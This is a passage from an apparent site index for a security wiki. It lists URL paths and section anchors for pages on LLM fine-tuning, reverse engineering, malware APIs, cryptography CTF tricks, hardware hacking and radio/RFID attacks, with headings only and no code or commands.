llm-architecture/7.1.-fine-tuning-for-classification.html#准备数据集","AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.html#数据集大小","AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.html#条目长度","AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.html#初始化模型","AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.html#分类头","AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.html#参数调整","AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.html#entries-to-use-for-training","AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.html#完整的gpt2微调分类代码","AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.html#参考文献","AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.html#72-微调以遵循指令","AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.html#数据集","AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.html#批处理和数据加载器","AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.html#加载预训练llm--微调--损失检查","AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.html#响应质量","AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.html#跟随指令微调代码","AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.html#参考文献","reversing/reversing-tools-basic-methods/index.html#反向工程工具与基本方法","reversing/reversing-tools-basic-methods/index.html#基于-imgui-的反向工程工具","reversing/reversing-tools-basic-methods/index.html#wasm-反编译器--wat-编译器","reversing/reversing-tools-basic-methods/index.html#net-反编译器","reversing/reversing-tools-basic-methods/index.html#dotpeek","reversing/reversing-tools-basic-methods/index.html#net-reflector","reversing/reversing-tools-basic-methods/index.html#ilspy--和--dnspy","reversing/reversing-tools-basic-methods/index.html#dnspy-日志记录","reversing/reversing-tools-basic-methods/index.html#dnspy-调试","reversing/reversing-tools-basic-methods/index.html#java-decompiler","reversing/reversing-tools-basic-methods/index.html#debugging-dlls","reversing/reversing-tools-basic-methods/index.html#using-ida","reversing/reversing-tools-basic-methods/index.html#using-x64dbgx32dbg","reversing/reversing-tools-basic-methods/index.html#gui-apps--videogames","reversing/reversing-tools-basic-methods/index.html#arm--mips","reversing/reversing-tools-basic-methods/index.html#shellcodes","reversing/reversing-tools-basic-methods/index.html#debugging-a-shellcode-with-blobrunner","reversing/reversing-tools-basic-methods/index.html#debugging-a-shellcode-with-jmp2it","reversing/reversing-tools-basic-methods/index.html#debugging-shellcode-using-cutter","reversing/reversing-tools-basic-methods/index.html#deobfuscating-shellcode-and-getting-executed-functions","reversing/reversing-tools-basic-methods/index.html#使用-cyberchef-反汇编","reversing/reversing-tools-basic-methods/index.html#movfuscator","reversing/reversing-tools-basic-methods/index.html#rust","reversing/reversing-tools-basic-methods/index.html#delphi","reversing/reversing-tools-basic-methods/index.html#golang","reversing/reversing-tools-basic-methods/index.html#编译的-python","reversing/reversing-tools-basic-methods/index.html#gba---game-body-advance","reversing/reversing-tools-basic-methods/index.html#game-boy","reversing/reversing-tools-basic-methods/index.html#courses","reversing/reversing-tools-basic-methods/angr/index.html#安装","reversing/reversing-tools-basic-methods/angr/index.html#基本操作","reversing/reversing-tools-basic-methods/angr/index.html#加载和主对象信息","reversing/reversing-tools-basic-methods/angr/index.html#加载的数据","reversing/reversing-tools-basic-methods/angr/index.html#主要目标","reversing/reversing-tools-basic-methods/angr/index.html#符号和重定位","reversing/reversing-tools-basic-methods/angr/index.html#块","reversing/reversing-tools-basic-methods/angr/index.html#动态分析","reversing/reversing-tools-basic-methods/angr/index.html#模拟管理器状态","reversing/reversing-tools-basic-methods/angr/index.html#调用函数","reversing/reversing-tools-basic-methods/angr/index.html#位向量","reversing/reversing-tools-basic-methods/angr/index.html#符号位向量与约束","reversing/reversing-tools-basic-methods/angr/index.html#钩子","reversing/reversing-tools-basic-methods/angr/index.html#示例","reversing/reversing-tools-basic-methods/angr/angr-examples.html#angr---示例","reversing/reversing-tools-basic-methods/angr/angr-examples.html#输入以到达地址指示地址","reversing/reversing-tools-basic-methods/angr/angr-examples.html#输入以到达地址指示打印","reversing/reversing-tools-basic-methods/angr/angr-examples.html#注册表值","reversing/reversing-tools-basic-methods/angr/angr-examples.html#堆栈值","reversing/reversing-tools-basic-methods/angr/angr-examples.html#静态内存值全局变量","reversing/reversing-tools-basic-methods/angr/angr-examples.html#动态内存值-malloc","reversing/reversing-tools-basic-methods/angr/angr-examples.html#文件模拟","reversing/reversing-tools-basic-methods/angr/angr-examples.html#应用约束","reversing/reversing-tools-basic-methods/angr/angr-examples.html#simulation-managers","reversing/reversing-tools-basic-methods/angr/angr-examples.html#钩子绕过对一个函数的调用","reversing/reversing-tools-basic-methods/angr/angr-examples.html#钩住一个函数--simprocedure","reversing/reversing-tools-basic-methods/angr/angr-examples.html#使用多个参数模拟-scanf","reversing/reversing-tools-basic-methods/angr/angr-examples.html#静态二进制文件","reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.html#基本操作","reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.html#布尔值与或非","reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.html#整数简化实数","reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.html#打印模型","reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.html#机器算术","reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.html#有符号无符号数字","reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.html#函数","reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.html#示例","reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.html#数独求解器","reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.html#参考文献","reversing/reversing-tools-basic-methods/cheat-engine.html#cheat-engine","reversing/reversing-tools-basic-methods/cheat-engine.html#你在搜索什么","reversing/reversing-tools-basic-methods/cheat-engine.html#热键","reversing/reversing-tools-basic-methods/cheat-engine.html#修改值","reversing/reversing-tools-basic-methods/cheat-engine.html#搜索值","reversing/reversing-tools-basic-methods/cheat-engine.html#通过已知的变化","reversing/reversing-tools-basic-methods/cheat-engine.html#未知值已知变化","reversing/reversing-tools-basic-methods/cheat-engine.html#随机内存地址---查找代码","reversing/reversing-tools-basic-methods/cheat-engine.html#随机内存地址---查找指针","reversing/reversing-tools-basic-methods/cheat-engine.html#代码注入","reversing/reversing-tools-basic-methods/cheat-engine.html#cheat-engine-7x-的高级功能2023-2025","reversing/reversing-tools-basic-methods/cheat-engine.html#指针扫描器-2-改进","reversing/reversing-tools-basic-methods/cheat-engine.html#ultimap-3--intel-pt-跟踪","reversing/reversing-tools-basic-methods/cheat-engine.html#1字节-jmp--自动补丁模板","reversing/reversing-tools-basic-methods/cheat-engine.html#使用-dbvmamd-和-intel进行内核级隐身","reversing/reversing-tools-basic-methods/cheat-engine.html#使用--ceserver--进行远程跨平台调试","reversing/reversing-tools-basic-methods/cheat-engine.html#其他值得注意的工具","reversing/reversing-tools-basic-methods/cheat-engine.html#安装与-opsec-注意事项-2024-2025","reversing/reversing-tools-basic-methods/cheat-engine.html#参考文献","reversing/reversing-tools-basic-methods/blobrunner.html","reversing/common-api-used-in-malware.html#常见-api-在-malware-中使用","reversing/common-api-used-in-malware.html#通用","reversing/common-api-used-in-malware.html#网络","reversing/common-api-used-in-malware.html#tls-pinning-and-chunked-transport","reversing/common-api-used-in-malware.html#持久化","reversing/common-api-used-in-malware.html#加密","reversing/common-api-used-in-malware.html#反分析vm","reversing/common-api-used-in-malware.html#emulator-api-fingerprinting--sleep-evasion","reversing/common-api-used-in-malware.html#stealth","reversing/common-api-used-in-malware.html#execution","reversing/common-api-used-in-malware.html#miscellaneous","reversing/common-api-used-in-malware.html#malware-techniques","reversing/common-api-used-in-malware.html#dll-injection","reversing/common-api-used-in-malware.html#reflective-dll-injection","reversing/common-api-used-in-malware.html#thread-hijacking","reversing/common-api-used-in-malware.html#pe-injection","reversing/common-api-used-in-malware.html#process-hollowing-aka--runpe-","reversing/common-api-used-in-malware.html#hooking","reversing/common-api-used-in-malware.html#references","reversing/word-macros.html#word-macros","reversing/word-macros.html#垃圾代码","reversing/word-macros.html#宏表单","crypto-and-stego/cryptographic-algorithms/index.html#加密压缩算法","crypto-and-stego/cryptographic-algorithms/index.html#识别算法","crypto-and-stego/cryptographic-algorithms/index.html#api-函数","crypto-and-stego/cryptographic-algorithms/index.html#代码常量","crypto-and-stego/cryptographic-algorithms/index.html#数据信息","crypto-and-stego/cryptographic-algorithms/index.html#rc4--对称加密","crypto-and-stego/cryptographic-algorithms/index.html#特点","crypto-and-stego/cryptographic-algorithms/index.html#初始化阶段替代盒-注意数字256作为计数器的使用以及在256个字符的每个位置写入0的方式","crypto-and-stego/cryptographic-algorithms/index.html#打乱阶段","crypto-and-stego/cryptographic-algorithms/index.html#异或阶段","crypto-and-stego/cryptographic-algorithms/index.html#aes-对称加密","crypto-and-stego/cryptographic-algorithms/index.html#特点-1","crypto-and-stego/cryptographic-algorithms/index.html#sbox-常量","crypto-and-stego/cryptographic-algorithms/index.html#serpent--对称加密","crypto-and-stego/cryptographic-algorithms/index.html#特点-2","crypto-and-stego/cryptographic-algorithms/index.html#识别","crypto-and-stego/cryptographic-algorithms/index.html#rsa--非对称加密","crypto-and-stego/cryptographic-algorithms/index.html#特点-3","crypto-and-stego/cryptographic-algorithms/index.html#通过比较识别","crypto-and-stego/cryptographic-algorithms/index.html#md5--sha哈希","crypto-and-stego/cryptographic-algorithms/index.html#特点-4","crypto-and-stego/cryptographic-algorithms/index.html#识别-1","crypto-and-stego/cryptographic-algorithms/index.html#crc哈希","crypto-and-stego/cryptographic-algorithms/index.html#识别-2","crypto-and-stego/cryptographic-algorithms/index.html#aplib压缩","crypto-and-stego/cryptographic-algorithms/index.html#特点-5","crypto-and-stego/cryptographic-algorithms/index.html#识别-3","crypto-and-stego/cryptographic-algorithms/unpacking-binaries.html#识别打包的二进制文件","crypto-and-stego/cryptographic-algorithms/unpacking-binaries.html#基本建议","crypto-and-stego/certificates.html#证书","crypto-and-stego/certificates.html#什么是证书","crypto-and-stego/certificates.html#x509-常见字段","crypto-and-stego/certificates.html#x509-证书中的常见字段","crypto-and-stego/certificates.html#ocsp与crl分发点的区别","crypto-and-stego/certificates.html#什么是证书透明性","crypto-and-stego/certificates.html#格式","crypto-and-stego/certificates.html#pem格式","crypto-and-stego/certificates.html#der格式","crypto-and-stego/certificates.html#p7bpkcs7格式","crypto-and-stego/certificates.html#pfxp12pkcs12格式","crypto-and-stego/certificates.html#格式转换","crypto-and-stego/cipher-block-chaining-cbc-mac-priv.html#cbc","crypto-and-stego/cipher-block-chaining-cbc-mac-priv.html#cbc-mac","crypto-and-stego/cipher-block-chaining-cbc-mac-priv.html#vulnerability","crypto-and-stego/cipher-block-chaining-cbc-mac-priv.html#summary","crypto-and-stego/cipher-block-chaining-cbc-mac-priv.html#attack-controlling-iv","crypto-and-stego/cipher-block-chaining-cbc-mac-priv.html#references","crypto-and-stego/crypto-ctfs-tricks.html#crypto-ctfs-tricks","crypto-and-stego/crypto-ctfs-tricks.html#在线哈希数据库","crypto-and-stego/crypto-ctfs-tricks.html#魔法自动解码器","crypto-and-stego/crypto-ctfs-tricks.html#编码器","crypto-and-stego/crypto-ctfs-tricks.html#替换自动解码器","crypto-and-stego/crypto-ctfs-tricks.html#基础编码自动解码器","crypto-and-stego/crypto-ctfs-tricks.html#hackerizexs--Λ-","crypto-and-stego/crypto-ctfs-tricks.html#摩尔斯","crypto-and-stego/crypto-ctfs-tricks.html#uuencoder","crypto-and-stego/crypto-ctfs-tricks.html#xxencoder","crypto-and-stego/crypto-ctfs-tricks.html#yencoder","crypto-and-stego/crypto-ctfs-tricks.html#binhex","crypto-and-stego/crypto-ctfs-tricks.html#ascii85","crypto-and-stego/crypto-ctfs-tricks.html#dvorak-键盘","crypto-and-stego/crypto-ctfs-tricks.html#a1z26","crypto-and-stego/crypto-ctfs-tricks.html#仿射密码编码","crypto-and-stego/crypto-ctfs-tricks.html#sms-code","crypto-and-stego/crypto-ctfs-tricks.html#bacon-code","crypto-and-stego/crypto-ctfs-tricks.html#runes","crypto-and-stego/crypto-ctfs-tricks.html#压缩","crypto-and-stego/crypto-ctfs-tricks.html#简易加密","crypto-and-stego/crypto-ctfs-tricks.html#xor---自动解密器","crypto-and-stego/crypto-ctfs-tricks.html#bifid","crypto-and-stego/crypto-ctfs-tricks.html#vigenere","crypto-and-stego/crypto-ctfs-tricks.html#强加密","crypto-and-stego/crypto-ctfs-tricks.html#fernet","crypto-and-stego/crypto-ctfs-tricks.html#samir-秘密共享","crypto-and-stego/crypto-ctfs-tricks.html#openssl-暴力破解","crypto-and-stego/crypto-ctfs-tricks.html#工具","crypto-and-stego/electronic-code-book-ecb.html#ecb","crypto-and-stego/electronic-code-book-ecb.html#漏洞检测","crypto-and-stego/electronic-code-book-ecb.html#漏洞利用","crypto-and-stego/electronic-code-book-ecb.html#移除整个块","crypto-and-stego/electronic-code-book-ecb.html#移动块","crypto-and-stego/electronic-code-book-ecb.html#参考","crypto-and-stego/hash-length-extension-attack.html#hash-length-extension-attack","crypto-and-stego/hash-length-extension-attack.html#攻击总结","crypto-and-stego/hash-length-extension-attack.html#如何","crypto-and-stego/hash-length-extension-attack.html#工具","crypto-and-stego/hash-length-extension-attack.html#参考文献","crypto-and-stego/padding-oracle-priv.html#padding-oracle","crypto-and-stego/padding-oracle-priv.html#cbc---密码块链接","crypto-and-stego/padding-oracle-priv.html#消息填充","crypto-and-stego/padding-oracle-priv.html#填充-oracle","crypto-and-stego/padding-oracle-priv.html#如何利用","crypto-and-stego/padding-oracle-priv.html#理论","crypto-and-stego/padding-oracle-priv.html#漏洞检测","crypto-and-stego/padding-oracle-priv.html#参考","crypto-and-stego/rc4-encrypt-and-decrypt.html#rc4-加密和解密","crypto-and-stego/stego-tricks.html#stego-tricks","crypto-and-stego/stego-tricks.html#从文件中提取数据","crypto-and-stego/stego-tricks.html#binwalk","crypto-and-stego/stego-tricks.html#foremost","crypto-and-stego/stego-tricks.html#exiftool","crypto-and-stego/stego-tricks.html#exiv2","crypto-and-stego/stego-tricks.html#文件","crypto-and-stego/stego-tricks.html#字符串","crypto-and-stego/stego-tricks.html#比较-cmp","crypto-and-stego/stego-tricks.html#提取文本中的隐藏数据","crypto-and-stego/stego-tricks.html#空格中的隐藏数据","crypto-and-stego/stego-tricks.html#从图像中提取数据","crypto-and-stego/stego-tricks.html#使用-graphicmagick-识别图像细节","crypto-and-stego/stego-tricks.html#steghide用于数据隐藏","crypto-and-stego/stego-tricks.html#zsteg用于png和bmp文件","crypto-and-stego/stego-tricks.html#stegoveritas和stegsolve","crypto-and-stego/stego-tricks.html#fft用于隐藏内容检测","crypto-and-stego/stego-tricks.html#stegpy用于音频和图像文件","crypto-and-stego/stego-tricks.html#pngcheck用于png文件分析","crypto-and-stego/stego-tricks.html#图像分析的附加工具","crypto-and-stego/stego-tricks.html#从音频中提取数据","crypto-and-stego/stego-tricks.html#steghide-jpeg-bmp-wav-au","crypto-and-stego/stego-tricks.html#stegpy-png-bmp-gif-webp-wav","crypto-and-stego/stego-tricks.html#ffmpeg","crypto-and-stego/stego-tricks.html#wavsteg-wav","crypto-and-stego/stego-tricks.html#deepsound","crypto-and-stego/stego-tricks.html#sonic-visualizer","crypto-and-stego/stego-tricks.html#dtmf-tones---dial-tones","crypto-and-stego/stego-tricks.html#other-techniques","crypto-and-stego/stego-tricks.html#binary-length-sqrt---qr-code","crypto-and-stego/stego-tricks.html#盲文翻译","crypto-and-stego/stego-tricks.html#参考文献","crypto-and-stego/esoteric-languages.html#esoteric-languages","crypto-and-stego/esoteric-languages.html#esolangs-wiki","crypto-and-stego/esoteric-languages.html#malbolge","crypto-and-stego/esoteric-languages.html#npiet","crypto-and-stego/esoteric-languages.html#rockstar","crypto-and-stego/esoteric-languages.html#petooh","crypto-and-stego/blockchain-and-crypto-currencies.html#基本概念","crypto-and-stego/blockchain-and-crypto-currencies.html#共识机制","crypto-and-stego/blockchain-and-crypto-currencies.html#比特币基础知识","crypto-and-stego/blockchain-and-crypto-currencies.html#交易","crypto-and-stego/blockchain-and-crypto-currencies.html#闪电网络","crypto-and-stego/blockchain-and-crypto-currencies.html#比特币隐私问题","crypto-and-stego/blockchain-and-crypto-currencies.html#匿名获取比特币","crypto-and-stego/blockchain-and-crypto-currencies.html#比特币隐私攻击","crypto-and-stego/blockchain-and-crypto-currencies.html#比特币隐私攻击总结","crypto-and-stego/blockchain-and-crypto-currencies.html#共同输入所有权假设","crypto-and-stego/blockchain-and-crypto-currencies.html#utxo找零地址检测","crypto-and-stego/blockchain-and-crypto-currencies.html#示例","crypto-and-stego/blockchain-and-crypto-currencies.html#社交网络与论坛曝光","crypto-and-stego/blockchain-and-crypto-currencies.html#交易图分析","crypto-and-stego/blockchain-and-crypto-currencies.html#不必要输入启发式最佳找零启发式","crypto-and-stego/blockchain-and-crypto-currencies.html#示例-1","crypto-and-stego/blockchain-and-crypto-currencies.html#强制地址重用","crypto-and-stego/blockchain-and-crypto-currencies.html#正确的钱包行为","crypto-and-stego/blockchain-and-crypto-currencies.html#其他区块链分析技术","crypto-and-stego/blockchain-and-crypto-currencies.html#流量分析","crypto-and-stego/blockchain-and-crypto-currencies.html#更多","crypto-and-stego/blockchain-and-crypto-currencies.html#匿名比特币交易","crypto-and-stego/blockchain-and-crypto-currencies.html#匿名获取比特币的方法","crypto-and-stego/blockchain-and-crypto-currencies.html#混合服务","crypto-and-stego/blockchain-and-crypto-currencies.html#coinjoin","crypto-and-stego/blockchain-and-crypto-currencies.html#payjoin","crypto-and-stego/blockchain-and-crypto-currencies.html#加密货币隐私的最佳实践","crypto-and-stego/blockchain-and-crypto-currencies.html#钱包同步技术","crypto-and-stego/blockchain-and-crypto-currencies.html#利用-tor-实现匿名性","crypto-and-stego/blockchain-and-crypto-currencies.html#防止地址重用","crypto-and-stego/blockchain-and-crypto-currencies.html#交易隐私策略","crypto-and-stego/blockchain-and-crypto-currencies.html#门罗币匿名性的灯塔","crypto-and-stego/blockchain-and-crypto-currencies.html#以太坊燃料费和交易","crypto-and-stego/blockchain-and-crypto-currencies.html#理解燃料费","crypto-and-stego/blockchain-and-crypto-currencies.html#执行交易","crypto-and-stego/blockchain-and-crypto-currencies.html#参考文献","todo/interesting-http.html#引荐头和策略","todo/interesting-http.html#敏感信息泄露","todo/interesting-http.html#缓解措施","todo/interesting-http.html#counter-mitigation","todo/interesting-http.html#防御","todo/rust-basics.html#rust-basics","todo/rust-basics.html#泛型","todo/rust-basics.html#option-some--none","todo/rust-basics.html#宏","todo/rust-basics.html#迭代","todo/rust-basics.html#递归盒子","todo/rust-basics.html#条件语句","todo/rust-basics.html#特性","todo/rust-basics.html#测试","todo/rust-basics.html#线程","todo/rust-basics.html#安全基础","todo/rust-basics.html#参考","todo/more-tools.html#blueteam","todo/more-tools.html#osint","todo/more-tools.html#web","todo/more-tools.html#windows","todo/more-tools.html#firmware","todo/more-tools.html#other","todo/hardware-hacking/index.html#硬件黑客","todo/hardware-hacking/index.html#jtag","todo/hardware-hacking/index.html#测试接入端口","todo/hardware-hacking/index.html#识别-jtag-引脚","todo/hardware-hacking/index.html#sdw","todo/hardware-hacking/fault_injection_attacks.html#fault-injection-attacks","todo/hardware-hacking/i2c.html#i2c","todo/hardware-hacking/i2c.html#bus-pirate","todo/hardware-hacking/i2c.html#sniffer","todo/hardware-hacking/side_channel_analysis.html#侧信道分析攻击","todo/hardware-hacking/side_channel_analysis.html#主要泄漏通道","todo/hardware-hacking/side_channel_analysis.html#电力分析","todo/hardware-hacking/side_channel_analysis.html#简单电力分析spa","todo/hardware-hacking/side_channel_analysis.html#differentialcorrelation-power-analysis-dpacpa","todo/hardware-hacking/side_channel_analysis.html#电磁分析-ema","todo/hardware-hacking/side_channel_analysis.html#定时与微架构攻击","todo/hardware-hacking/side_channel_analysis.html#声学与光学攻击","todo/hardware-hacking/side_channel_analysis.html#故障注入与差分故障分析-dfa","todo/hardware-hacking/side_channel_analysis.html#典型攻击工作流程","todo/hardware-hacking/side_channel_analysis.html#防御与加固","todo/hardware-hacking/side_channel_analysis.html#工具与框架","todo/hardware-hacking/side_channel_analysis.html#参考文献","todo/hardware-hacking/uart.html#uart","todo/hardware-hacking/uart.html#基本信息","todo/hardware-hacking/uart.html#识别uart端口","todo/hardware-hacking/uart.html#识别uart波特率","todo/hardware-hacking/uart.html#cp210x-uart到tty适配器","todo/hardware-hacking/uart.html#通过-arduino-uno-r3-的-uart-可拆卸的-atmel-328p-芯片板","todo/hardware-hacking/uart.html#bus-pirate","todo/hardware-hacking/uart.html#通过-uart-控制台转储固件","todo/hardware-hacking/radio.html#radio","todo/hardware-hacking/radio.html#sigdigger","todo/hardware-hacking/radio.html#basic-config","todo/hardware-hacking/radio.html#uses","todo/hardware-hacking/radio.html#synchronize-with-radio-channel","todo/hardware-hacking/radio.html#interesting-tricks","todo/hardware-hacking/radio.html#uncovering-modulation-type-with-iq","todo/hardware-hacking/radio.html#am-example","todo/hardware-hacking/radio.html#uncovering-am","todo/hardware-hacking/radio.html#get-symbol-rate","todo/hardware-hacking/radio.html#get-bits","todo/hardware-hacking/radio.html#fm-example","todo/hardware-hacking/radio.html#uncovering-fm","todo/hardware-hacking/radio.html#get-symbol-rate-1","todo/hardware-hacking/radio.html#get-bits-1","todo/hardware-hacking/jtag.html#jtag","todo/hardware-hacking/jtag.html#jtagenum","todo/hardware-hacking/jtag.html#更安全的引脚探测和硬件设置","todo/hardware-hacking/jtag.html#与openocd的首次接触扫描和idcode","todo/hardware-hacking/jtag.html#停止-cpu-并转储内存闪存","todo/hardware-hacking/jtag.html#边界扫描技巧-extestsample","todo/hardware-hacking/jtag.html#现代目标和注意事项","todo/hardware-hacking/jtag.html#防御和加固在真实设备上预期的内容","todo/hardware-hacking/jtag.html#参考文献","todo/hardware-hacking/spi.html#spi","todo/hardware-hacking/spi.html#基本信息","todo/hardware-hacking/spi.html#从eeprom中转储固件","todo/hardware-hacking/spi.html#ch341a-eeprom编程器和读取器","todo/hardware-hacking/spi.html#bus-pirate--flashrom","todo/industrial-control-systems-hacking/index.html#工业控制系统黑客技术","todo/industrial-control-systems-hacking/index.html#关于本节","todo/industrial-control-systems-hacking/modbus.html#modbus协议","todo/industrial-control-systems-hacking/modbus.html#modbus协议简介","todo/industrial-control-systems-hacking/modbus.html#客户端-服务器架构","todo/industrial-control-systems-hacking/modbus.html#串行和以太网版本","todo/industrial-control-systems-hacking/modbus.html#数据表示","todo/industrial-control-systems-hacking/modbus.html#功能代码","todo/industrial-control-systems-hacking/modbus.html#modbus的寻址","todo/radio-hacking/index.html#无线电黑客","todo/radio-hacking/maxiprox-mobile-cloner.html#构建便携式-hid-maxiprox-125-khz-移动克隆器","todo/radio-hacking/maxiprox-mobile-cloner.html#目标","todo/radio-hacking/maxiprox-mobile-cloner.html#材料清单-bom","todo/radio-hacking/maxiprox-mobile-cloner.html#1-电源子系统","todo/radio-hacking/maxiprox-mobile-cloner.html#2-蜂鸣器杀开关---静音操作","todo/radio-hacking/maxiprox-mobile-cloner.html#3-外壳与机械工作","todo/radio-hacking/maxiprox-mobile-cloner.html#4-最终组装","todo/radio-hacking/maxiprox-mobile-cloner.html#5-范围与屏蔽测试","todo/radio-hacking/maxiprox-mobile-cloner.html#使用工作流程","todo/radio-hacking/maxiprox-mobile-cloner.html#故障排除","todo/radio-hacking/maxiprox-mobile-cloner.html#参考文献","todo/radio-hacking/pentesting-rfid.html#pentesting-rfid","todo/radio-hacking/pentesting-rfid.html#介绍","todo/radio-hacking/pentesting-rfid.html#分类","todo/radio-hacking/pentesting-rfid.html#rfid-标签中存储的信息","todo/radio-hacking/pentesting-rfid.html#低频与高频标签比较","todo/radio-hacking/pentesting-rfid.html#低频-rfid-标签125khz","todo/radio-hacking/pentesting-rfid.html#攻击","todo/radio-hacking/pentesting-rfid.html#高频-rfid-标签1356-mhz","todo/radio-hacking/pentesting-rfid.html#攻击-1","todo/radio-hacking/pentesting-rfid.html#mifare-classic-offline-stored-value-tampering-broken-crypto1","todo/radio-hacking/pentesting-rfid.html#制作便携式-hid-maxiprox-125-khz-mobile-cloner","todo/radio-hacking/pentesting-rfid.html#参考资料","todo/radio-hacking/infrared.html#红外线","todo/radio-hacking/infrared.html#红外线的工作原理","todo/radio-hacking/infrared.html#红外协议的多样性","todo/radio-hacking/infrared.html#探索红外信号","todo/radio-hacking/infrared.html#空调","todo/radio-hacking/infrared.html#攻击与攻防研究","todo/radio-hacking/infrared.html#智能电视机顶盒接管evilscreen","todo/radio-hacking/infrared.html#通过红外led进行空气间隔数据外泄air-jumper家族","todo/radio-hacking/infrared.html#使用flipper-zero-10进行远程暴力破解和扩展协议","todo/radio-hacking/infrared.html#工具与实用示例","todo/radio-hacking/infrared.html#硬件","todo/radio-hacking/infrared.html#软件","todo/radio-hacking/infrared.html#防御措施","todo/radio-hacking/infrared.html#参考文献","todo/radio-hacking/sub-ghz-rf.html#sub-ghz-rf","todo/radio-hacking/sub-ghz-rf.html#garage-doors","todo/radio-hacking/sub-ghz-rf.html#car-doors","todo/radio-hacking/sub-ghz-rf.html#brute-force-attack","todo/radio-hacking/sub-ghz-rf.html#sub-ghz-attack","todo/radio-hacking/sub-ghz-rf.html#rolling-codes-protection","todo/radio-hacking/sub-ghz-rf.html#missing-link-attack","todo/radio-hacking/sub-ghz-rf.html#full-link-jamming-attack","todo/radio-hacking/sub-ghz-rf.html#code-grabbing-attack--aka-rolljam-","todo/radio-hacking/sub-ghz-rf.html#alarm-sounding-jamming-attack","todo/radio-hacking/sub-ghz-rf.html#references","todo/radio-hacking/ibutton.html#ibutton","todo/radio-hacking/ibutton.html#intro","todo/radio-hacking/ibutton.html#what-is-ibutton","todo/radio-hacking/ibutton.html#1-wire-protocol","todo/radio-hacking/ibutton.html#dallas-cyfral--metakom-keys","todo/radio-hacking/ibutton.html#attacks","todo/radio-hacking/ibutton.html#references","todo/radio-hacking/flipper-zero/index.html#flipper-zero","todo/radio-hacking/flipper-zero/fz-nfc.html#fz---nfc","todo/radio-hacking/flipper-zero/fz-nfc.html#intro","todo/radio-hacking/flipper-zero/fz-nfc.html#supported-nfc-cards","todo/radio-hacking/flipper-zero/fz-nfc.html#nfc-cards-type-a","todo/radio-hacking/flipper-zero/fz-nfc.html#nfc-cards-types-b-f-and-v","todo/radio-hacking/flipper-zero/fz-nfc.html#actions","todo/radio-hacking/flipper-zero/fz-nfc.html#read","todo/radio-hacking/flipper-zero/fz-nfc.html#read-specific","todo/radio-hacking/flipper-zero/fz-nfc.html#references","todo/radio-hacking/flipper-zero/fz-sub-ghz.html#fz---sub-ghz","todo/radio-hacking/flipper-zero/fz-sub-ghz.html#intro","todo/radio-hacking/flipper-zero/fz-sub-ghz.html#sub-ghz-hardware","todo/radio-hacking/flipper-zero/fz-sub-ghz.html#actions","todo/radio-hacking/flipper-zero/fz-sub-ghz.html#frequency-analyser","todo/radio-hacking/flipper-zero/fz-sub-ghz.html#read","todo/radio-hacking/flipper-zero/fz-sub-ghz.html#read-raw","todo/radio-hacking/flipper-zero/fz-sub-ghz.html#brute-force","todo/radio-hacking/flipper-zero/fz-sub-ghz.html#add-manually","todo/radio-hacking/flipper-zero/fz-sub-ghz.html#支持的-sub-ghz-供应商","todo/radio-hacking/flipper-zero/fz-sub-ghz.html#按地区支持的频率","todo/radio-hacking/flipper-zero/fz-sub-ghz.html#test","todo/radio-hacking/flipper-zero/fz-sub-ghz.html#reference","todo/radio-hacking/flipper-zero/fz-infrared.html#fz---infrared","todo/radio-hacking/flipper-zero/fz-infrared.html#intro","todo/radio-hacking/flipper-zero/fz-infrared.html#ir-signal-receiver-in-flipper-zero","todo/radio-hacking/flipper-zero/fz-infrared.html#actions","todo/radio-hacking/flipper-zero/fz-infrared.html#universal-remotes","todo/radio-hacking/flipper-zero/fz-infrared.html#learn-new-remote","todo/radio-hacking/flipper-zero/fz-infrared.html#references","todo/radio-hacking/flipper-zero/fz-ibutton.html#fz---ibutton","todo/radio-hacking/flipper-zero/fz-ibutton.html#intro","todo/radio-hacking/flipper-zero/fz-ibutton.html#design","todo/radio-hacking/flipper-zero/fz-ibutton.html#actions","todo/radio-hacking/flipper-zero/fz-ibutton.html#read","todo/radio-hacking/flipper-zero/fz-ibutton.html#add-manually","todo/radio-hacking/flipper-zero/fz-ibutton.html#emulate","todo/radio-hacking/flipper-zero/fz-ibutton.html#references","todo/radio-hacking/flipper-zero/fz-125khz-rfid.html#fz---125khz-rfid","todo/radio-hacking/flipper-zero/fz-125khz-rfid.html#intro","todo/radio-hacking/flipper-zero/fz-125khz-rfid.html#actions","todo/radio-hacking/flipper-zero/fz-125khz-rfid.html#read","todo/radio-hacking/flipper-zero/fz-125khz-rfid.html#add-manually","todo/radio-hacking/flipper-zero/fz-125khz-rfid.html#emulatewrite","todo/radio-hacking/flipper-zero/fz-125khz-rfid.html#references","todo/radio-hacking/proxmark-3.html#proxmark-3","todo/radio-hacking/proxmark-3.html#使用-proxmark3-攻击-rfid-系统","todo/radio-hacking/proxmark-3.html#针对-mifare-classic-1kb-的攻击","todo/radio-hacking/proxmark-3.html#原始命令","todo/radio-hacking/proxmark-3.html#脚本","todo/radio-hacking/proxmark-3.html#参考资料","todo/radio-hacking/fissure-the-rf-framework.html#fissure---the-rf-framework","todo/radio-hacking/fissure-the-rf-framework.html#开始使用","todo/radio-hacking/fissure-the-rf-framework.html#详细信息","todo/radio-hacking/fissure-the-rf-framework.html#课程","todo/radio-hacking/fissure-the-rf-framework.html#路线图","todo/radio-hacking/f